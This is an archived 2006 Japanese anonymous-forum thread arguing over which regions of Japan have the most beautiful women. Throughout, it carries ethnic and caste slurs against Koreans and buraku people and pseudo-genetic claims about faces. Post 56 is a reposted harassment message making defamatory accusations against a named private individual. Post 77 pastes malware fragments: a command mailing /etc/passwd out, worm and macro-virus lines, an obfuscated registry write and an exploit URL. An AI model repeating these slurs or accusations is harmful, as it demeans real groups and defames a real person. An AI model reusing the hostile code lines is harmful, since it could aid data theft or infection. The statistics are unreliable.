5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【都道府県】日本で美人の多い地域〜8人目〜

1 :名無しさん@お腹いっぱい。:2006/09/15(金) 09:03:47 ID:tTIgMY8L
【都道府県】日本で美人の多い地域〜7人目〜
http://academy4.2ch.net/test/read.cgi/geo/1154934542/

2 :名無しさん@お腹いっぱい。:2006/09/15(金) 09:13:47 ID:Z4o5qZ4y
ここか

3 :名無しさん@お腹いっぱい。:2006/09/15(金) 10:00:39 ID:Y+Fp3ofE
日本の女は口が臭い

4 :名無しさん@お腹いっぱい。:2006/09/15(金) 10:03:40 ID:7AdbVnZd
ここじゃな

5 :名無しさん@お腹いっぱい。:2006/09/15(金) 10:07:43 ID:Y+Fp3ofE
日本の女は口が臭い

6 :名無しさん@お腹いっぱい。:2006/09/15(金) 16:03:02 ID:Y+Fp3ofE
日本の女は口が臭い

7 :名無しさん@お腹いっぱい。:2006/09/15(金) 16:52:09 ID:BC+XvJ5s
男もだろ

8 :名無しさん@お腹いっぱい。:2006/09/15(金) 20:39:49 ID:Rc/TjTuu
日本三大美人産地ってどこですか?

9 :名無しさん@お腹いっぱい。:2006/09/15(金) 21:32:54 ID:Y+Fp3ofE
日本の女は口が臭い

10 :名無しさん@お腹いっぱい。:2006/09/15(金) 22:11:23 ID:p+ruueGK
>>8
そんなものはない。
強いて言うなら択捉島、国後島、歯舞諸島だ

11 :名無しさん@お腹いっぱい。:2006/09/15(金) 22:48:06 ID:9OaPDh/b
九州沖縄地域に決まってるね。
蒙古襞なしの美人が多い。
特に西側の本州人の影響の少ない地域。

12 :名無しさん@お腹いっぱい。:2006/09/15(金) 23:16:35 ID:kDIiYPAa
まず蒙古襞がどこを指すのか説明してください。

13 :名無しさん@お腹いっぱい。:2006/09/16(土) 00:04:43 ID:J0usD0Ib
蒙古襞は東洋顔と西洋顔を決める
最大にして最強のファクター

14 :名無しさん@お腹いっぱい。:2006/09/16(土) 01:07:34 ID:JZpvJnh1
>>12
チョン

15 :名無しさん@お腹いっぱい。:2006/09/16(土) 01:08:34 ID:3K9QU3va
オメコ襞

16 :名無しさん@お腹いっぱい。:2006/09/16(土) 02:28:29 ID:udzLWRbY
>>13
>蒙古襞は東洋顔と西洋顔を決める
>最大にして最強のファクター
そんなことはない
中国人の多くにはないよ
蒙古斑さえない人がたくさんいる
目だって中国人は二重瞼の方が多い

17 :名無しさん@お腹いっぱい。:2006/09/16(土) 15:55:21 ID:PGrrGnG3
ラクティスの九州女めっさ不細工じゃねぇか

18 :名無しさん@お腹いっぱい。:2006/09/16(土) 16:06:32 ID:iHbTzK/y
愛知県だろ
美人タレントの兵藤ゆきを見れば分かる

19 :名無しさん@お腹いっぱい。:2006/09/16(土) 18:18:53 ID:I5//tPxJ
>>17
この中じゃ九州の娘が一番かわいい
http://www.ractis.com/


20 :在日:2006/09/16(土) 20:06:06 ID:/sRanoIz
日本の女は口が臭い

21 :在日オーストリア人:2006/09/16(土) 20:13:21 ID:be2lqtMS
在日ってどこからの?

22 :名無しさん@お腹いっぱい。:2006/09/16(土) 21:26:01 ID:4MqbTc8L
何が言いたいの?

23 :名無しさん@お腹いっぱい。:2006/09/17(日) 05:34:07 ID:GzOI5xnR
日本の女は口が臭い

24 :名無しさん@お腹いっぱい。:2006/09/17(日) 16:24:31 ID:GzOI5xnR
日本の女は口が臭い

25 :名無しさん@お腹いっぱい。:2006/09/18(月) 09:28:56 ID:/wW60gqI
日本の女は口が臭い

26 :名無しさん@お腹いっぱい。:2006/09/18(月) 12:13:08 ID:/wW60gqI
日本の女は口が臭い

27 :名無しさん@お腹いっぱい。:2006/09/18(月) 22:18:51 ID:jkV3Z+NT
大阪

28 :名無しさん@お腹いっぱい。:2006/09/19(火) 18:21:18 ID:nlT64xCr
>>8
司馬遼太郎があげたので、日本三大美人ってのはあった気がする。
秋田美人、出雲美人、あとどこだか忘れた。

29 :名無しさん@お腹いっぱい。:2006/09/20(水) 01:38:53 ID:OxlT90U3
日本の女は口が臭い

30 :名無しさん@お腹いっぱい。:2006/09/22(金) 21:10:16 ID:X5UebO1j
大阪だな

31 :名無しさん@お腹いっぱい。:2006/09/24(日) 19:59:55 ID:DfosMxhH
このサイトでは、さまざまな日本人顔の特徴を詳しく述べている。

ニッポン カオロジィ ttp://www.gakusei.ne.jp/kaology/seikaku.html

基本ベースになる6系統のルーツは、おそらくこんなところだろう。

モンゴリアン系(満蒙人タイプ)
ミカドニアン系(穢人・秦人タイプ)
ドラグーン系(漢人・倭人タイプ)
ヤマタイ系(呉人・苗人タイプ)
トロピカル系(タイ人・隼人タイプ)
オリジン系(縄文人タイプ)

このサイトの中で、ネオ○○○○系となっているものは
おそらくアムール川流域が発祥の黒水靺鞨(大和朝廷の天敵)の血を受け継ぐ流れではないかと。
芸能人や風俗嬢、部落、白丁に多いタイプです。
私は白人とのクォーターですというのが口癖だが
出身を隠すためにそう言っていると思った方がいいでしょう。

32 :名無しさん@お腹いっぱい。:2006/09/24(日) 20:26:42 ID:30L1LkAj
>>28 多摩美人

33 :名無しさん@お腹いっぱい。:2006/09/25(月) 02:43:53 ID:xr1tOdAd
日本でヤマタイ系が多いは九州ぽいな。

34 :名無しさん@お腹いっぱい。:2006/09/25(月) 02:52:27 ID:IMHifZ5n
京美人・博多美人・秋田美人

35 :名無しさん@お腹いっぱい。:2006/10/11(水) 18:27:13 ID:mrwOzTqg
どうみても九州沖縄全域でしょ。
福岡市でも蒙古襞がない目がパッチリした
人ばっかりだよ。
九州から東北に行って本州山口、広島とか四国になると
一気に蒙古襞バリバリの一重瞼の朝鮮顔が増える。
中国四国地方、九州地方の人と接する機会が
多い漏れの実感。
九州福岡以南はとにかく蒙古襞がないパッチリ目が多い。

36 :名無しさん@お腹いっぱい。:2006/10/11(水) 19:41:52 ID:h4jl0TUK
九州ってイ・スンヨプみたいな顔の人多いよね。

37 :名無しさん@お腹いっぱい。:2006/10/11(水) 20:03:05 ID:h4jl0TUK
九州って、大昔から朝鮮からの密入国者や倭寇が連れ去ってきた朝鮮人がいっぱいいそう。

38 :名無しさん@お腹いっぱい。:2006/10/11(水) 21:58:10 ID:+SdcKMn+
■弥生人中国説にダマされる前に読むスレ■
1 :日本@名無史さん :2006/07/09(日) 16:36:31
江南説にしろ華北説にしろ、弥生人が本当に中国から来たのなら、

何で印文陶や灰釉陶を含めた中国灰陶の技術が全く伝わっていないのかね?

何で中国青銅器に見られる篆書などの原始漢字の金文が一字も
伝わっていないのかね?

何で中国青銅器に見られる饕餮文、龍文、鳳凰文、雷文などの
文様の一つさえ伝わっていないのかね?

何で中国土器や中国青銅器を代表する鼎や鬲などの三足器形さえ
伝わっていないのかね?

何で龍信仰も亀卜も伝わっていないのかね?

渡海すると記憶喪失になって故郷の文化は全て忘れてしまうのかね?

何で弥生文化は朝鮮無文土器が影響した弥生土器と遼寧式(満州式)青銅器と
支石墓文化なのかね?

これらは当時の満州から朝鮮にかけての文化ですよ。
http://academy4.2ch.net/test/read.cgi/history/1152430591

39 :名無しさん@お腹いっぱい。:2006/10/12(木) 03:00:57 ID:TNCLo6SG
北海道男子平均身長・二重率→174.2cm・8割
東北   ”       →173.1cm・5割
東京都  ”       →170.8cm・4割
関西   ”       →170.6cm・3割
九州   ”       →170.2cm・3割
沖縄   ”       →169・0cm・6割


40 :名無しさん@お腹いっぱい。:2006/10/12(木) 20:54:49 ID:6Ut3uufa
西日本は奥二重をカウントしなかったのでは?
身長は合ってると思うが。

41 :名無しさん@お腹いっぱい。:2006/10/13(金) 12:32:21 ID:6b3l9ZIw
北海道は胡散臭いだろw
調査年代を古いの持って来てんじゃないか?

42 :名無しさん@お腹いっぱい。:2006/10/13(金) 21:42:09 ID:yhMPaMAA
東北2割 東京3割なら分かるが

43 :名無しさん@お腹いっぱい。:2006/10/14(土) 22:10:11 ID:8yDR1S9C
■沖縄ってブサイク日本人多■
http://travel2.2ch.net/test/read.cgi/travel/1137698812/


44 :名無しさん@お腹いっぱい。:2006/10/16(月) 23:46:56 ID:B7+fsrXK
269 列島縦断名無しさん sage 2006/06/19(月) 20:44:01 ID:J0xp54TFO
>>267
非沖縄人。

工作員乙。


沖縄の人は、普通に美形が多いと思うが・・・
ブサイクなのは国際通りと、その他
観光地でしか見られない・・・
つまり観光客・・・
沖縄訛りで話さない人が
ブサイク多い奇ガス・・・

307 列島縦断名無しさん 2006/07/30(日) 11:18:47 ID:W4IcKFvoO
知花くららって知ってるかい?お前らがここでどう論じようが沖縄顔がグローバルスタンダードなんだよ。沖縄の米兵も言ってるぜ。目が細くて色白の日本人は気持ち悪いってな。

310 列島縦断名無しさん 2006/07/31(月) 01:33:51 ID:tPGL8IE2O
ないちゃーは色白で目細くてきもい。これは沖縄米兵共通の認識。

313 列島縦断名無しさん 2006/07/31(月) 16:16:45 ID:KAtXCwxo0
>>312
ないちゃーのなまりでもててるんじゃないの?顔は良くないよないちゃー女は。
俺も去年まで都内の大学に通っていたけど10回程度告られた。
俺の彼女も沖縄人だけど相当もててた。
二人で新宿駅なんか歩いていると、まるで芸能人でも見るかのような目で見られた。
あとないちゃーってかっこいいやつがいるといつも、「沖縄顔じゃないよね。」
っていうね。俺の家系は先祖代々沖縄なのに。

335 列島縦断名無しさん 2006/08/07(月) 17:36:13 ID:fxuJGTzGO
お前らはかっこいいやつとかわいいやつは無視して、不細工ばかり取り上げて典型的な沖縄顔って言ってるな。よーし。俺も言ってやるぜ。ないちゃーの典型は光浦や森三中。ないちゃーって目が細くて気持ち悪いな

336 列島縦断名無しさん 2006/08/07(月) 17:40:31 ID:fxuJGTzGO
あと、この間テレビでやってたんだが見たか?アイドルを含む10人の女の中で誰が一番かわいいかアメリカ人に聞いたら、宮里藍だった。まあ、沖縄顔がグローバルスタンダードってことよ。外人からすればないちゃーはガキにしか見えないらしいぜ。

362 列島縦断名無しさん 2006/08/10(木) 21:36:41 ID:YSvXol+ZO
沖縄も内地もカワイイ人はいると思うよ☆俺だって内地行った時は芸能人みたいのがいっぱいいるのかと期待したけど、のっぺらぼうで出っ歯が定番だったし☆スタイルは沖縄よりいいけどね♪沖縄も内地も人によりけり

366 列島縦断名無しさん 2006/08/11(金) 01:22:37 ID:MaeWiQXLO
360さんへ!朝鮮人と日本人って何が違うんですか?親に「朝鮮人ってどんな顔?」って聞いたら、「日本(本土の人)と同じ顔だよ」って!ちなみに親は十年間内地に住んでました。

369 列島縦断名無しさん 2006/08/11(金) 20:00:15 ID:u3yNO8V8O
沖縄のブスと本土のブス比べたら沖縄のほうがブス。
沖縄の美人と本土の美人比べたら沖縄のほうが美人。

370 列島縦断名無しさん sage 2006/08/11(金) 21:41:40 ID:EQMBkp6V0
>>369
いやそれは違うな
日本でベスト100に入る美人のうち99人は本土にいる
日本でワースト100に入るブスのうち99人は本土にいる

375 列島縦断名無しさん 2006/08/17(木) 12:43:08 ID:6+JxOd+GO
>>362たしかにスタイルは抜群だけど 顔がのっぺらしてる。特に男なんかドランクドラゴン鈴木みたいなのがいっぱい。
逆に沖縄は渡嘉ちゃんみたいな濃くて臭そうな黒光りした男がたくさん。おまけに毛深い

45 :名無しさん@お腹いっぱい。:2006/10/16(月) 23:47:37 ID:B7+fsrXK
378 列島縦断名無しさん 2006/08/17(木) 20:26:58 ID:O6JjIG5e0
沖縄と言っても本島と離島では顔つきが違う。
本島は南方系が入っているが、離島はそうでもない。
八重山は台湾系もよく入っている。

380 列島縦断名無しさん 2006/08/18(金) 00:36:24 ID:2jKfOK1b0
専門学生の時沖縄にいたけど、
沖縄の女の人はハーフとか外国の血が混ざってる子が多くてきれいな顔立ちの人もいれば目が大きい人も多くて本土よりカワイイ人がたくさんいた印象を受けました。w
ブスはどこにでもいるけど、カワイイ子がいる比率的には沖縄のほうが上だと思います。

390 列島縦断名無しさん 2006/08/20(日) 04:48:47 ID:9ihXFvmZ0
本土→化粧美人多し。
沖縄→化粧ブス多し。

392 列島縦断名無しさん sage 2006/08/20(日) 15:01:25 ID:863Gn2z4O
>>390
確かにそうだ。内地は顔が薄いから化粧映えする。

全島エイサー祭りにいって確信した。沖縄の女は日本で一番かわいい。東京は人が多いのにかわいい子が全然いなかった。全島エイサー祭りに行ったら見渡すかぎりかわいい子。ナイチャー崇拝の俺の友達も「顔だけなら沖縄女が最強かもな」だと。

395 列島縦断名無しさん 2006/08/22(火) 20:28:11 ID:g5bqoqoVO
>394
うん、そう思う。
沖縄に旅行に行った時、女の子みんな綺麗な子ばっかだった。

何ていうか、ハーフっぽいっていうかエキゾチックっていうか、
みんな綺麗だった。

425 列島縦断名無しさん 2006/08/27(日) 10:46:00 ID:PLVJakjN0
このスレにいるないちゃーよ、客観的に本音を言い合って話そうぜ。
俺は男はないちゃーの方がかっこいいと思う。身長もあるし。
だけど女は500%沖縄だろ?
北谷のフリマとか美浜とかジャスコとかに行ってみて。
かわいい子がうじゃうじゃいるから。ただ、確かに好みとかはある。
でも、長澤まさみとか山口もえとか一体どこがかわいいの?
全く理解できない。子供にしか見えない。
俺観光地で働いてもう3000人程度のないちゃー女見たけど
ただの一度も70点以上の女を見たことがない。
なのに近所のスーパーに行ったら80点以上の子がごろごろいる。
アメリカ人の友達に長澤とか山口とかの写真見せてもやっぱり
「子供にしか見えない。」っていって、まだ宮里藍の方を押すよ。
断っておくけど、23歳ぐらいまでは沖縄の女は日本で一番不細工だと
信じていたんだぜ。で、ないちゃーはかわいいと。
だから観光地で働いたというのに、なんだよこのザマは。

439 列島縦断名無しさん 2006/09/01(金) 02:39:53 ID:tTm03Yi2O
だーかーらー、九州・沖縄地方の南側が基本的に最高だって。
九州をここで言う内地(本州)と一緒に含めないでね。

縄文系遺伝子は九州・沖縄が強いから。
本州は弥生系遺伝子がMAXだから。

九州で生まれ育ち、顔も石垣の人より濃い私が断言。

491 列島縦断名無しさん 2006/09/07(木) 22:46:51 ID:hKY3IRzDO
本土みたいにアゴ無しとか、粘土細工みたいな顔はいないな。

薄いブサイクより濃いブサイクのほうがマシではある


46 :名無しさん@お腹いっぱい。:2006/10/20(金) 15:48:26 ID:dQP04jw5
清楚な芸能人ワンツーで神奈川人(小雪&松嶋菜々子)
偶然にも二人とも座間市出身だったりする

座間市
http://local.yahoo.co.jp/static/a114/a214216/outline.html
http://ja.wikipedia.org/wiki/%E5%BA%A7%E9%96%93%E5%B8%82

47 :沖縄男:2006/10/20(金) 19:59:41 ID:mRLxsM0V
>>アメリカ人の友達に長澤とか山口とかの写真見せてもやっぱり
「子供にしか見えない。」っていって、まだ宮里藍の方を押すよ。

ふざけるな。宮里藍?
毛深いし色黒いし男みたいな顔だろ。
おまえ眼科行け。それか新宿2丁目でおかまにケツ掘られろ。


48 :名無しさん@お腹いっぱい。:2006/10/21(土) 01:12:29 ID:lJgyqvUh
もののけ姫を米国の子供が見て

ヒロインは 烏帽子御前だと思ってたらしい

サンは 子供にしか見えないと

49 :落葉樹林のソウルは東京より上ってスレがあるんだけど:2006/10/21(土) 03:26:43 ID:wYsDtBdJ
スレの内容からすると、世界の先進国の大都市のほとんどが落葉樹林帯なのだが
日本の首都東京だけは常緑樹林だと。
常緑樹林は低俗な東南アジアだと。
だから寒い気候の朝鮮半島は先進国だと。
なんかすごい飛躍してる話ですが、これを地理・人類学の見地から見ていきましょう。

50 :名無しさん@お腹いっぱい。:2006/10/21(土) 03:45:29 ID:lJgyqvUh
>>49
韓国朝鮮人は半島にお帰り下さい。

51 :名無しさん@お腹いっぱい。:2006/10/21(土) 10:38:34 ID:KO16iY9i
>>47
>東京は人が多いのにかわいい子が全然いなかった。
沖縄はどうか知らんが、少なくとも、これは当たってるだろ。
山口とか長澤はいねーよ、どこにも。
なんで俺、こんなとこに住んでんだろ。

52 :名無しさん@お腹いっぱい。:2006/10/21(土) 13:59:10 ID:fLNo/CND
>>45
>アメリカ人の友達に長澤とか山口とかの写真見せてもやっぱり
>「子供にしか見えない。」っていって、まだ宮里藍の方を押すよ。
アメリカの芸能界自体に可愛い少女が一人もいない。
ブスとオバケのオンパレード。

53 :名無しさん@お腹いっぱい。:2006/10/21(土) 14:10:54 ID:9fhbJMW+
>>51
山口って東京人だろ

54 :名無しさん@お腹いっぱい。:2006/10/21(土) 14:32:50 ID:3BDoYJ5k
ルーツじゃないと意味ないんじゃない?
東京や神奈川に代々住んでる人少ないし。

今まで美人だと思った人、大抵東北(特に秋田・青森)か九州系だよ。

55 :名無しさん@お腹いっぱい。:2006/10/21(土) 16:21:03 ID:7jAq+/rv
九州・北東北は即刻列島から独立し
真の美しい国
九州北東北連合国日本誕生へ

 

56 :名無しさん@お腹いっぱい。:2006/10/21(土) 18:38:26 ID:Pj0hZI8i

157 :夢見る名無しさん :2006/07/10(月) 22:53:34 O
時々目にする「竹石圭佑」という奴をまとめてみました…

@両親が在日(中国人)。名古屋在中?
A顔が出目金or宇宙人そっくり。
B新成人だが、知能が小学生程度(理由は下記の事項より)。
C「自分より力の弱い」女子生徒や女子教師をイジメの格好の的としていた。
D意中の女子には例外なく「ちょっかい」を出して気を引こうとしていた。
E万引きで数回捕まり、長期停学を検討していた(らしい)校長や他職員に大声で泣きながら謝罪。廊下まで泣き声が響いたらしい。
F自分は一般人とは違うと思っており、異常なほどの目立ちたがり屋で注目される為なら何でもする。
Gあまりにも女子に相手にされないことから気が触れ(?)、後輩や仲の良い男子生徒にも手を出す。噂だが注意が必要。
…ちなみにこれらは竹石圭佑の一部にすぎないらしく、
詳しく知りたいならば本人に直接聞くのが一番手っ取り早いそうです。

57 :名無しさん@お腹いっぱい。:2006/10/22(日) 06:50:15 ID:SsLE00/j
↓日本で最高の血族を作りたい!
http://school5.2ch.net/test/read.cgi/edu/1161465539/l50
平凡な家系が日本でどの程度までのし上がれるか狙うスレです。
遺伝子レベルから教育論、果ては経済戦略まで
明日の日本の政治・経済を担う有名血族を自分達の手で作ってみませんか?
皆様の英知をお待ちしております。

58 :名無しさん@お腹いっぱい。:2006/10/24(火) 22:19:50 ID:mRnt7okP
イタいよ、東北人。


282 :名無しさん@お腹いっぱい。:2006/10/20(金) 15:44:12 ID:dQP04jw5
清楚な芸能人ワンツーで神奈川人(小雪&松嶋菜々子)
偶然にも二人とも座間市出身だったりする

座間市
http://local.yahoo.co.jp/static/a114/a214216/outline.html
http://ja.wikipedia.org/wiki/%E5%BA%A7%E9%96%93%E5%B8%82

59 :名無しさん@お腹いっぱい。:2006/10/24(火) 22:20:42 ID:mRnt7okP
イタいよ、東北人。


283 :名無しさん@お腹いっぱい。:2006/10/20(金) 16:59:31 ID:aVk4pbZv
小雪の母は東北。松嶋菜々子もそうらしい

60 :名無しさん@お腹いっぱい。:2006/10/24(火) 22:22:18 ID:mRnt7okP
イタいよ、東北人。


291 :名無しさん@お腹いっぱい。:2006/10/22(日) 23:23:23 ID:JFL8lyaL
>>283
小雪の母親は東北じゃないよ。
小雪の家(加藤家)は座間の栗原地域の地主系の家。
父親はその地主系の加藤家で、母親は座間市西部の人。


292 :名無しさん@お腹いっぱい。:2006/10/22(日) 23:26:03 ID:JFL8lyaL
ちなみに、うちの親が小雪母と一小(現座間小)で同級生だった。
よって、小雪は父親も母親も神奈川県出身。

61 :名無しさん@お腹いっぱい。:2006/10/27(金) 22:04:36 ID:6b5QMNsD
薩摩娘と琉球娘

江南顔と台湾高砂顔

62 :61:2006/10/27(金) 22:05:23 ID:6b5QMNsD
>>61
この写真の印象ね
ttp://www.imgup.org/iup279350.jpg

63 :名無しさん@お腹いっぱい。:2006/10/27(金) 22:11:21 ID:XM5MUj1u
>>60

http://www.fiberbit.net/user/tamamiami/nigaoe50.htm


64 :名無しさん@お腹いっぱい。:2006/10/28(土) 11:05:51 ID:PSz445R7
>>63
道理で草薙剛に似てる。

65 :名無しさん@お腹いっぱい。:2006/10/28(土) 11:14:49 ID:ELjGwlG+
全然、似てない

66 :名無しさん@お腹いっぱい。:2006/10/28(土) 12:20:56 ID:OcV5+bei
共通点は色白と切れ長な目ってとこか

67 :名無しさん@お腹いっぱい。:2006/10/28(土) 16:25:44 ID:F3qtZMCw
303 :291:2006/10/28(土) 01:37:08 ID:veW48T3e
>>300
小雪がどういう風に言ったのかは不明だけど、母親が現座間小卒で座間中卒なのは間違いないよ。
小雪が有名になり始めた時に、母親の座間小・座間中時代の同級生の子供っていうことで結構話題になったから。
たぶん小雪の発言は(母方の)祖母か、祖母の母親か、それ以前の代に東北出身者がいるってことかと。
母親の実家が座間ということは少なくても母親が東北出身という意味ではないかと。
母方のルーツに東北があるのかも知れないけどね。

68 :名無しさん@お腹いっぱい。:2006/10/28(土) 19:45:05 ID:ErFCs9rq
>48ってかあれ、子供の設定だろ。


69 :名無しさん@お腹いっぱい。:2006/10/28(土) 19:47:36 ID:CJck941U
新潟

70 :名無しさん@お腹いっぱい。:2006/10/29(日) 19:46:27 ID:tWGO1K7R
新潟だよ

71 :名無しさん@お腹いっぱい。:2006/10/30(月) 17:19:05 ID:llV8teVL
319 :291:2006/10/28(土) 22:59:44 ID:veW48T3e
私の要らぬ指摘で荒れてしまったようで。(笑)
ただ、小雪の母親の実家が座間というのは間違いないです。
それ以前の代に東北の血があることは考えられるけど。
小雪の発言がどういう流れから出たかがわからないから何とも言えないけど、
うちの母親によると小雪と小雪の母親はあまり似てないって。
強いて言えば、比較的色白で背がその世代としては高いことぐらいとのこと。

もうあらぬ方向で荒れそうなんで、これ以上はこの話しはしません。(笑)
どうしても知りたいようであれば、まちBBSの座間スレの過去ログに小雪ネタいっぱいあるんで。

72 :名無しさん@お腹いっぱい。:2006/10/30(月) 17:20:01 ID:llV8teVL
324 :名無しさん@お腹いっぱい。:2006/10/29(日) 17:45:56 ID:dvu2Ibi5
>>319
別に荒れてるってほどじゃないよw
その話しは小雪という名前どおり肌が白いですねという話しになって
小雪が母の家族がもともと東北の血があるんでとかいう話しが出てたような気がした
母の直接の出身が東北ということは言ってなかったけど東北の血というかルーツがあるみたいな話しだった

73 :名無しさん@お腹いっぱい。:2006/10/30(月) 18:18:45 ID:OQ3CwCgN
日本人種のYAP+と東南アジア辺りのYAP+は別種。

日本人種のYAP+はht1。
東南アジア・中国南部あたりに微かに残るYAP+はht2。
白人や黒人のYAP+はht3。

ゆえに日本人種は中国南部や東南アジアとは無関係。

残念でした(嘲笑)

◎YAP+マップ

http://www.geocities.com/londonross1/china3.png
http://native.way-nifty.com/./native_heart/images/y_chromosome.jpg

74 :名無しさん@お腹いっぱい。:2006/10/30(月) 19:05:50 ID:1lDio8L3
ふりかえるほど美人率は札幌が1番

75 :名無しさん@お腹いっぱい。:2006/10/30(月) 20:44:03 ID:VVFrxGRl
ソースがないとな


76 :名無しさん@お腹いっぱい。:2006/11/08(水) 13:08:07 ID:9LF8cewv
まぁな

自分で嘘書いてコピペまで必死だなプゲラwwソース貼れよID:llV8teVL




77 :名無しさん@お腹いっぱい。:2006/11/09(木) 00:47:18 ID:EmkFoDcs
4:<body onload=window()> [cat /etc/passwd | mail nobody@nonexistent.com]
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c

78 :名無しさん@お腹いっぱい。:2006/12/19(火) 15:14:03 ID:mrLupjIA
http://news6.2ch.net/test/read.cgi/mnewsplus/1077569050/

79 :名無しさん@お腹いっぱい。:2007/02/10(土) 04:28:47 ID:QnjDKNio
静岡に一票

24 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)